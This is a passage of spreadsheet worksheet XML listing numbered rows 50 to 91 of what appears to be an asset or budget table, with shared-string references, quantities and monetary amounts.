        <v>134400</v>
      </c>
      <c r="L55" s="10"/>
    </row>
    <row r="56" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A56" s="93"/>
      <c r="B56" s="88">
        <v>50</v>
      </c>
      <c r="C56" s="237" t="s">
        <v>2858</v>
      </c>
      <c r="D56" s="238" t="s">
        <v>2859</v>
      </c>
      <c r="E56" s="238" t="s">
        <v>555</v>
      </c>
      <c r="F56" s="9"/>
      <c r="G56" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H56" s="11">
        <v>1</v>
      </c>
      <c r="I56" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J56" s="126">
        <v>7600</v>
      </c>
      <c r="K56" s="99">
        <v>486.4</v>
      </c>
      <c r="L56" s="10"/>
    </row>
    <row r="57" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A57" s="93"/>
      <c r="B57" s="88">
        <v>51</v>
      </c>
      <c r="C57" s="237" t="s">
        <v>2860</v>
      </c>
      <c r="D57" s="238" t="s">
        <v>2861</v>
      </c>
      <c r="E57" s="238" t="s">
        <v>2862</v>
      </c>
      <c r="F57" s="9"/>
      <c r="G57" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H57" s="11">
        <v>1</v>
      </c>
      <c r="I57" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J57" s="126">
        <v>170000</v>
      </c>
      <c r="K57" s="99">
        <v>28560</v>
      </c>
      <c r="L57" s="10" t="s">
        <v>2863</v>
      </c>
    </row>
    <row r="58" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A58" s="93"/>
      <c r="B58" s="88">
        <v>52</v>
      </c>
      <c r="C58" s="237" t="s">
        <v>2864</v>
      </c>
      <c r="D58" s="238" t="s">
        <v>2865</v>
      </c>
      <c r="E58" s="238" t="s">
        <v>2866</v>
      </c>
      <c r="F58" s="9"/>
      <c r="G58" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H58" s="11">
        <v>1</v>
      </c>
      <c r="I58" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J58" s="126">
        <v>13000</v>
      </c>
      <c r="K58" s="99">
        <v>832</v>
      </c>
      <c r="L58" s="10"/>
    </row>
    <row r="59" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A59" s="93"/>
      <c r="B59" s="88">
        <v>53</v>
      </c>
      <c r="C59" s="237" t="s">
        <v>2867</v>
      </c>
      <c r="D59" s="238" t="s">
        <v>944</v>
      </c>
      <c r="E59" s="238" t="s">
        <v>2868</v>
      </c>
      <c r="F59" s="9"/>
      <c r="G59" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H59" s="11">
        <v>1</v>
      </c>
      <c r="I59" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J59" s="126">
        <v>350000</v>
      </c>
      <c r="K59" s="99">
        <v>0</v>
      </c>
      <c r="L59" s="10" t="s">
        <v>2869</v>
      </c>
    </row>
    <row r="60" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A60" s="93"/>
      <c r="B60" s="88">
        <v>54</v>
      </c>
      <c r="C60" s="237" t="s">
        <v>2870</v>
      </c>
      <c r="D60" s="238" t="s">
        <v>2871</v>
      </c>
      <c r="E60" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="F60" s="9"/>
      <c r="G60" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H60" s="11">
        <v>4</v>
      </c>
      <c r="I60" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J60" s="126">
        <v>155000</v>
      </c>
      <c r="K60" s="99">
        <v>6200</v>
      </c>
      <c r="L60" s="10"/>
    </row>
    <row r="61" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A61" s="93"/>
      <c r="B61" s="88">
        <v>55</v>
      </c>
      <c r="C61" s="237" t="s">
        <v>2872</v>
      </c>
      <c r="D61" s="238" t="s">
        <v>2873</v>
      </c>
      <c r="E61" s="238" t="s">
        <v>2874</v>
      </c>
      <c r="F61" s="9"/>
      <c r="G61" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H61" s="11">
        <v>3</v>
      </c>
      <c r="I61" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J61" s="126">
        <v>58000</v>
      </c>
      <c r="K61" s="99">
        <v>2320</v>
      </c>
      <c r="L61" s="10"/>
    </row>
    <row r="62" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A62" s="93"/>
      <c r="B62" s="88">
        <v>56</v>
      </c>
      <c r="C62" s="237" t="s">
        <v>2875</v>
      </c>
      <c r="D62" s="238" t="s">
        <v>2876</v>
      </c>
      <c r="E62" s="238" t="s">
        <v>2877</v>
      </c>
      <c r="F62" s="9"/>
      <c r="G62" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H62" s="11">
        <v>1</v>
      </c>
      <c r="I62" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J62" s="126">
        <v>162800</v>
      </c>
      <c r="K62" s="99">
        <v>10419.2</v>
      </c>
      <c r="L62" s="10"/>
    </row>
    <row r="63" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A63" s="93"/>
      <c r="B63" s="88">
        <v>57</v>
      </c>
      <c r="C63" s="237" t="s">
        <v>2878</v>
      </c>
      <c r="D63" s="238" t="s">
        <v>2879</v>
      </c>
      <c r="E63" s="238" t="s">
        <v>2880</v>
      </c>
      <c r="F63" s="9"/>
      <c r="G63" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H63" s="11">
        <v>1</v>
      </c>
      <c r="I63" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J63" s="126">
        <v>15300</v>
      </c>
      <c r="K63" s="99">
        <v>979.2</v>
      </c>
      <c r="L63" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="64" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A64" s="93"/>
      <c r="B64" s="88">
        <v>58</v>
      </c>
      <c r="C64" s="237" t="s">
        <v>2881</v>
      </c>
      <c r="D64" s="238" t="s">
        <v>2882</v>
      </c>
      <c r="E64" s="238" t="s">
        <v>2883</v>
      </c>
      <c r="F64" s="9"/>
      <c r="G64" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H64" s="11">
        <v>4</v>
      </c>
      <c r="I64" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J64" s="126">
        <v>310000</v>
      </c>
      <c r="K64" s="99">
        <v>0</v>
      </c>
      <c r="L64" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="65" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A65" s="93"/>
      <c r="B65" s="88">
        <v>59</v>
      </c>
      <c r="C65" s="237" t="s">
        <v>2884</v>
      </c>
      <c r="D65" s="238" t="s">
        <v>2885</v>
      </c>
      <c r="E65" s="238" t="s">
        <v>2874</v>
      </c>
      <c r="F65" s="9"/>
      <c r="G65" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="11">
        <v>1</v>
      </c>
      <c r="I65" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J65" s="126">
        <v>57000</v>
      </c>
      <c r="K65" s="99">
        <v>2280</v>
      </c>
      <c r="L65" s="10"/>
    </row>
    <row r="66" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A66" s="93"/>
      <c r="B66" s="88">
        <v>60</v>
      </c>
      <c r="C66" s="237" t="s">
        <v>2886</v>
      </c>
      <c r="D66" s="238" t="s">
        <v>334</v>
      </c>
      <c r="E66" s="238" t="s">
        <v>2887</v>
      </c>
      <c r="F66" s="9"/>
      <c r="G66" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H66" s="11">
        <v>1</v>
      </c>
      <c r="I66" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J66" s="126">
        <v>24000</v>
      </c>
      <c r="K66" s="99">
        <v>960</v>
      </c>
      <c r="L66" s="10"/>
    </row>
    <row r="67" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A67" s="93"/>
      <c r="B67" s="88">
        <v>61</v>
      </c>
      <c r="C67" s="237" t="s">
        <v>2888</v>
      </c>
      <c r="D67" s="238" t="s">
        <v>2889</v>
      </c>
      <c r="E67" s="238" t="s">
        <v>2890</v>
      </c>
      <c r="F67" s="9"/>
      <c r="G67" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H67" s="11">
        <v>1</v>
      </c>
      <c r="I67" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J67" s="126">
        <v>20000</v>
      </c>
      <c r="K67" s="99">
        <v>800</v>
      </c>
      <c r="L67" s="10"/>
    </row>
    <row r="68" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A68" s="93"/>
      <c r="B68" s="88">
        <v>62</v>
      </c>
      <c r="C68" s="237" t="s">
        <v>2891</v>
      </c>
      <c r="D68" s="238" t="s">
        <v>2892</v>
      </c>
      <c r="E68" s="238" t="s">
        <v>2893</v>
      </c>
      <c r="F68" s="9"/>
      <c r="G68" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H68" s="11">
        <v>1</v>
      </c>
      <c r="I68" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J68" s="126">
        <v>120000</v>
      </c>
      <c r="K68" s="99">
        <v>4800</v>
      </c>
      <c r="L68" s="238" t="s">
        <v>2894</v>
      </c>
    </row>
    <row r="69" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A69" s="93"/>
      <c r="B69" s="88">
        <v>63</v>
      </c>
      <c r="C69" s="237" t="s">
        <v>2895</v>
      </c>
      <c r="D69" s="238" t="s">
        <v>2896</v>
      </c>
      <c r="E69" s="238" t="s">
        <v>2897</v>
      </c>
      <c r="F69" s="9"/>
      <c r="G69" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H69" s="11">
        <v>1</v>
      </c>
      <c r="I69" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J69" s="126">
        <v>1570000</v>
      </c>
      <c r="K69" s="99">
        <v>192000</v>
      </c>
      <c r="L69" s="10"/>
    </row>
    <row r="70" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A70" s="93"/>
      <c r="B70" s="88">
        <v>64</v>
      </c>
      <c r="C70" s="237" t="s">
        <v>2898</v>
      </c>
      <c r="D70" s="238" t="s">
        <v>2899</v>
      </c>
      <c r="E70" s="238" t="s">
        <v>2900</v>
      </c>
      <c r="F70" s="9"/>
      <c r="G70" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H70" s="11">
        <v>1</v>
      </c>
      <c r="I70" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J70" s="126">
        <v>269897.44</v>
      </c>
      <c r="K70" s="99">
        <v>17267.2</v>
      </c>
      <c r="L70" s="10"/>
    </row>
    <row r="71" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A71" s="93"/>
      <c r="B71" s="88">
        <v>65</v>
      </c>
      <c r="C71" s="237" t="s">
        <v>2901</v>
      </c>
      <c r="D71" s="238" t="s">
        <v>2902</v>
      </c>
      <c r="E71" s="238" t="s">
        <v>2903</v>
      </c>
      <c r="F71" s="9"/>
      <c r="G71" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H71" s="11">
        <v>1</v>
      </c>
      <c r="I71" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J71" s="126">
        <v>700000</v>
      </c>
      <c r="K71" s="99">
        <v>44800</v>
      </c>
      <c r="L71" s="10"/>
    </row>
    <row r="72" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A72" s="93"/>
      <c r="B72" s="88">
        <v>66</v>
      </c>
      <c r="C72" s="237" t="s">
        <v>2904</v>
      </c>
      <c r="D72" s="238" t="s">
        <v>2905</v>
      </c>
      <c r="E72" s="238" t="s">
        <v>2906</v>
      </c>
      <c r="F72" s="9"/>
      <c r="G72" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H72" s="11">
        <v>1</v>
      </c>
      <c r="I72" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J72" s="126">
        <v>200000</v>
      </c>
      <c r="K72" s="99">
        <v>12800</v>
      </c>
      <c r="L72" s="10"/>
    </row>
    <row r="73" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A73" s="93"/>
      <c r="B73" s="88">
        <v>67</v>
      </c>
      <c r="C73" s="237" t="s">
        <v>2907</v>
      </c>
      <c r="D73" s="238" t="s">
        <v>2908</v>
      </c>
      <c r="E73" s="238" t="s">
        <v>2909</v>
      </c>
      <c r="F73" s="9"/>
      <c r="G73" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H73" s="11">
        <v>1</v>
      </c>
      <c r="I73" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J73" s="126">
        <v>60000</v>
      </c>
      <c r="K73" s="99">
        <v>3840</v>
      </c>
      <c r="L73" s="10"/>
    </row>
    <row r="74" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A74" s="93"/>
      <c r="B74" s="88">
        <v>68</v>
      </c>
      <c r="C74" s="237" t="s">
        <v>2910</v>
      </c>
      <c r="D74" s="238" t="s">
        <v>2911</v>
      </c>
      <c r="E74" s="238" t="s">
        <v>2912</v>
      </c>
      <c r="F74" s="9"/>
      <c r="G74" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H74" s="11">
        <v>2</v>
      </c>
      <c r="I74" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J74" s="126">
        <v>300000</v>
      </c>
      <c r="K74" s="99">
        <v>19200</v>
      </c>
      <c r="L74" s="10"/>
    </row>
    <row r="75" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A75" s="93"/>
      <c r="B75" s="88">
        <v>69</v>
      </c>
      <c r="C75" s="237" t="s">
        <v>2913</v>
      </c>
      <c r="D75" s="238" t="s">
        <v>2914</v>
      </c>
      <c r="E75" s="238" t="s">
        <v>2915</v>
      </c>
      <c r="F75" s="9"/>
      <c r="G75" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H75" s="11">
        <v>1</v>
      </c>
      <c r="I75" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J75" s="126">
        <v>200000</v>
      </c>
      <c r="K75" s="99">
        <v>24000</v>
      </c>
      <c r="L75" s="238" t="s">
        <v>2916</v>
      </c>
    </row>
    <row r="76" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A76" s="93"/>
      <c r="B76" s="88">
        <v>70</v>
      </c>
      <c r="C76" s="237" t="s">
        <v>2917</v>
      </c>
      <c r="D76" s="238" t="s">
        <v>2918</v>
      </c>
      <c r="E76" s="238" t="s">
        <v>2912</v>
      </c>
      <c r="F76" s="9"/>
      <c r="G76" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H76" s="11">
        <v>1</v>
      </c>
      <c r="I76" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J76" s="126">
        <v>90000</v>
      </c>
      <c r="K76" s="99">
        <v>5760</v>
      </c>
      <c r="L76" s="10"/>
    </row>
    <row r="77" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A77" s="93"/>
      <c r="B77" s="88">
        <v>71</v>
      </c>
      <c r="C77" s="237" t="s">
        <v>2919</v>
      </c>
      <c r="D77" s="238" t="s">
        <v>2920</v>
      </c>
      <c r="E77" s="238" t="s">
        <v>2921</v>
      </c>
      <c r="F77" s="9"/>
      <c r="G77" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H77" s="11">
        <v>1</v>
      </c>
      <c r="I77" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J77" s="126">
        <v>200000</v>
      </c>
      <c r="K77" s="99">
        <v>12800</v>
      </c>
      <c r="L77" s="10"/>
    </row>
    <row r="78" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A78" s="93"/>
      <c r="B78" s="88">
        <v>72</v>
      </c>
      <c r="C78" s="237" t="s">
        <v>2922</v>
      </c>
      <c r="D78" s="238" t="s">
        <v>2923</v>
      </c>
      <c r="E78" s="238" t="s">
        <v>2924</v>
      </c>
      <c r="F78" s="9"/>
      <c r="G78" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H78" s="11">
        <v>1</v>
      </c>
      <c r="I78" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J78" s="126">
        <v>140000</v>
      </c>
      <c r="K78" s="99">
        <v>0</v>
      </c>
      <c r="L78" s="10"/>
    </row>
    <row r="79" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A79" s="93"/>
      <c r="B79" s="88">
        <v>73</v>
      </c>
      <c r="C79" s="237" t="s">
        <v>2925</v>
      </c>
      <c r="D79" s="238" t="s">
        <v>2926</v>
      </c>
      <c r="E79" s="238" t="s">
        <v>2927</v>
      </c>
      <c r="F79" s="9"/>
      <c r="G79" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H79" s="11">
        <v>1</v>
      </c>
      <c r="I79" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J79" s="126">
        <v>22000</v>
      </c>
      <c r="K79" s="99">
        <v>0</v>
      </c>
      <c r="L79" s="10"/>
    </row>
    <row r="80" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A80" s="93"/>
      <c r="B80" s="88">
        <v>74</v>
      </c>
      <c r="C80" s="237" t="s">
        <v>2928</v>
      </c>
      <c r="D80" s="238" t="s">
        <v>1378</v>
      </c>
      <c r="E80" s="238" t="s">
        <v>2929</v>
      </c>
      <c r="F80" s="9"/>
      <c r="G80" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H80" s="11">
        <v>1</v>
      </c>
      <c r="I80" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J80" s="126">
        <v>18000</v>
      </c>
      <c r="K80" s="99">
        <v>1152</v>
      </c>
      <c r="L80" s="10"/>
    </row>
    <row r="81" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A81" s="93"/>
      <c r="B81" s="88">
        <v>75</v>
      </c>
      <c r="C81" s="237" t="s">
        <v>2930</v>
      </c>
      <c r="D81" s="238" t="s">
        <v>2931</v>
      </c>
      <c r="E81" s="238" t="s">
        <v>2932</v>
      </c>
      <c r="F81" s="9"/>
      <c r="G81" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H81" s="11">
        <v>1</v>
      </c>
      <c r="I81" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J81" s="126">
        <v>35000</v>
      </c>
      <c r="K81" s="99">
        <v>2240</v>
      </c>
      <c r="L81" s="10"/>
    </row>
    <row r="82" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A82" s="93"/>
      <c r="B82" s="88">
        <v>76</v>
      </c>
      <c r="C82" s="237" t="s">
        <v>2933</v>
      </c>
      <c r="D82" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E82" s="238" t="s">
        <v>2934</v>
      </c>
      <c r="F82" s="9"/>
      <c r="G82" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H82" s="11">
        <v>1</v>
      </c>
      <c r="I82" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J82" s="126">
        <v>185000</v>
      </c>
      <c r="K82" s="99">
        <v>11840</v>
      </c>
      <c r="L82" s="10"/>
    </row>
    <row r="83" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A83" s="93"/>
      <c r="B83" s="88">
        <v>77</v>
      </c>
      <c r="C83" s="237" t="s">
        <v>2935</v>
      </c>
      <c r="D83" s="238" t="s">
        <v>1129</v>
      </c>
      <c r="E83" s="238" t="s">
        <v>1076</v>
      </c>
      <c r="F83" s="9"/>
      <c r="G83" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H83" s="11">
        <v>1</v>
      </c>
      <c r="I83" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J83" s="126">
        <v>5000</v>
      </c>
      <c r="K83" s="99">
        <v>3200</v>
      </c>
      <c r="L83" s="10" t="s">
        <v>2936</v>
      </c>
    </row>
    <row r="84" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A84" s="93"/>
      <c r="B84" s="88">
        <v>78</v>
      </c>
      <c r="C84" s="237" t="s">
        <v>2937</v>
      </c>
      <c r="D84" s="238" t="s">
        <v>2938</v>
      </c>
      <c r="E84" s="238" t="s">
        <v>2939</v>
      </c>
      <c r="F84" s="9"/>
      <c r="G84" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H84" s="11">
        <v>1</v>
      </c>
      <c r="I84" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J84" s="126">
        <v>450000</v>
      </c>
      <c r="K84" s="99">
        <v>28800</v>
      </c>
      <c r="L84" s="10" t="s">
        <v>2940</v>
      </c>
    </row>
    <row r="85" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A85" s="93"/>
      <c r="B85" s="88">
        <v>79</v>
      </c>
      <c r="C85" s="237" t="s">
        <v>2941</v>
      </c>
      <c r="D85" s="238" t="s">
        <v>2942</v>
      </c>
      <c r="E85" s="238" t="s">
        <v>2943</v>
      </c>
      <c r="F85" s="9" t="s">
        <v>2944</v>
      </c>
      <c r="G85" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H85" s="11">
        <v>1</v>
      </c>
      <c r="I85" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J85" s="126">
        <v>140000</v>
      </c>
      <c r="K85" s="99">
        <v>8960</v>
      </c>
      <c r="L85" s="10"/>
    </row>
    <row r="86" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A86" s="93"/>
      <c r="B86" s="88">
        <v>80</v>
      </c>
      <c r="C86" s="237" t="s">
        <v>2945</v>
      </c>
      <c r="D86" s="238" t="s">
        <v>2946</v>
      </c>
      <c r="E86" s="238" t="s">
        <v>2947</v>
      </c>
      <c r="F86" s="9"/>
      <c r="G86" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H86" s="11">
        <v>2</v>
      </c>
      <c r="I86" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J86" s="126">
        <v>2500</v>
      </c>
      <c r="K86" s="99">
        <v>1600</v>
      </c>
      <c r="L86" s="10" t="s">
        <v>2948</v>
      </c>
    </row>
    <row r="87" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A87" s="93"/>
      <c r="B87" s="88">
        <v>81</v>
      </c>
      <c r="C87" s="237" t="s">
        <v>2949</v>
      </c>
      <c r="D87" s="238" t="s">
        <v>2755</v>
      </c>
      <c r="E87" s="238" t="s">
        <v>2950</v>
      </c>
      <c r="F87" s="9"/>
      <c r="G87" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H87" s="11">
        <v>1</v>
      </c>
      <c r="I87" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J87" s="126">
        <v>50000</v>
      </c>
      <c r="K87" s="99">
        <v>6000</v>
      </c>
      <c r="L87" s="10"/>
    </row>
    <row r="88" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A88" s="93"/>
      <c r="B88" s="88">
        <v>82</v>
      </c>
      <c r="C88" s="237" t="s">
        <v>2951</v>
      </c>
      <c r="D88" s="238" t="s">
        <v>2758</v>
      </c>
      <c r="E88" s="238" t="s">
        <v>2950</v>
      </c>
      <c r="F88" s="9"/>
      <c r="G88" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H88" s="11">
        <v>1</v>
      </c>
      <c r="I88" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J88" s="126">
        <v>360000</v>
      </c>
      <c r="K88" s="99">
        <v>43200</v>
      </c>
      <c r="L88" s="10"/>
    </row>
    <row r="89" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A89" s="93"/>
      <c r="B89" s="88">
        <v>83</v>
      </c>
      <c r="C89" s="237" t="s">
        <v>2952</v>
      </c>
      <c r="D89" s="238" t="s">
        <v>2953</v>
      </c>
      <c r="E89" s="238" t="s">
        <v>2954</v>
      </c>
      <c r="F89" s="9"/>
      <c r="G89" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H89" s="11">
        <v>1</v>
      </c>
      <c r="I89" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J89" s="126">
        <v>20000</v>
      </c>
      <c r="K89" s="99">
        <v>0</v>
      </c>
      <c r="L89" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="90" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A90" s="93"/>
      <c r="B90" s="88">
        <v>84</v>
      </c>
      <c r="C90" s="237" t="s">
        <v>2955</v>
      </c>
      <c r="D90" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E90" s="238" t="s">
        <v>2956</v>
      </c>
      <c r="F90" s="9"/>
      <c r="G90" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H90" s="11">
        <v>2</v>
      </c>
      <c r="I90" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J90" s="126">
        <v>6400</v>
      </c>
      <c r="K90" s="99">
        <v>0</v>
      </c>
      <c r="L90" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="91" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A91" s="93"/>
      <c r="B91" s="88">
        <v>85</v>
      </c>
      <c r="C91" s="237" t="s">
        <v>2957</v>
      </c>
      <c r="D91" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E91" s="238" t="s">
        <v>2958</v>
      </c>
      <c r="F91" s="9"/>
      <c r="G91" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H91" s="11">
        <v>4</v>
      </c>
      <c r="I91" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J91" s="126">
        <v>50000</v>
      </c>
      <c r="K91" s="99">
        <v>2000</v>
      </c>
      <c r="L91" s="10"/>
    </row>
    <row r="92" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A92" s="93"/>
      <c r="B92" s="88">
        <v>86</v>
      </c>
      <c r="C92" s="237" t="s">
        <v>2959</v>
      </c>
      <c r="D92" s="238" t="s">
        <v>2960</v>
      </c>
      <c r="E92" s="238" t="s">
        <v>2961</v>
      </c>
      <c r="F92" s="9"/>
      <c r="G92" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H92" s="11">
        <v>1</v>
      </c>
      <c r="I92" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J92" s="126">
        <v>1000</v>
      </c>
      <c r="K92" s="99">
        <v>640</v>
      </c>
      <c r="L92" s="10"/>
    </row>
    <row r="93" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A93" s="93"/>
      <c r="B93" s="88">
        <v>87</v>
      </c>
      <c r="C93" s="237" t="s">
        <v>2962</v>
      </c>
      <c r="D93" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E93" s="238" t="s">
        <v>2963</v>
      </c>
      <c r="F93" s="9"/>
      <c r="G93" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H93" s="11">
        <v>1</v>
      </c>
      <c r="I93" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J93" s="126">
        <v>1200</v>
      </c>
      <c r="K93" s="99">
        <v>48</v>
      </c>
      <c r="L93" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="94" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A94" s="93"/>
      <c r="B94" s="88">
        <v>88</v>
      </c>
      <c r="C94" s="237" t="s">
        <v>2964</v>
      </c>
      <c r="D94" s="238" t="s">
        <v>2965</v>
      </c>
      <c r="E94" s="238" t="s">
        <v>2966</v>
      </c>
      <c r="F94" s="9"/>
      <c r="G94" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H94" s="11">
        <v>4</v>
      </c>
      <c r="I94" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J94" s="126">
        <v>40000</v>
      </c>
      <c r="K94" s="99">
        <v>1600</v>
      </c>
      <c r="L94" s="10" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="95" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A95" s="93"/>
      <c r="B95" s="88">
        <v>89</v>
      </c>
      <c r="C95" s="237" t="s">
        <v>2967</v>
      </c>
      <c r="D95" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E95" s="238" t="s">
        <v>2968</v>
      </c>
      <c r="F95" s="9"/>
      <c r="G95" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H95" s="11">
        <v>2</v>
      </c>
      <c r="I95" s="238" t="s">
        <v>1072</v>
      </c>
      <c r="J95" s="126">
        <v>101400</v>
      </c>
      <c r="K95" s="99">
        <v>0</v>
      </c>
      <c r="L95" s="10"/>
    </row>
    <row r="96" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A96" s="93"/>
      <c r="B96" s="88">
        <v>90</v>
      </c>
      <c r="C96" s="237" t="s">
        <v>2969</v>
      </c>
      <c r="D96" s="238" t="s">
        <v>2970</v>
      </c>
      <c r="E96" s="238" t="s">
        <v>2971</v>
      </c>
      <c r="F96" s="9"/>
      <c r="G96" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H96" s="11">
        <v>2</v>
      </c>
      <c r="I96" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J96" s="126">
        <v>591056</v>
      </c>
      <c r="K96" s="99">
        <v>0</v>
      </c>
      <c r="L96" s="10"/>
    </row>
    <row r="97" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A97" s="93"/>
      <c r="B97" s="88">
        <v>91</v>
      </c>
      <c r="C97" s="237" t="s">
        <v>2972</v>
      </c>
      <c r="D97" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E97" s="238" t="s">
        <v>2973</v>
      </c>
      <c r="F97" s="9"/>
      <c r="G97" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H97" s="11">
        <v>1</v>
      </c>
      <c r="I97" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J97" s="126">
        <v>43000</v>
      </c>
      <c r="K97" s="99">
        <v>0</v>
      </c>
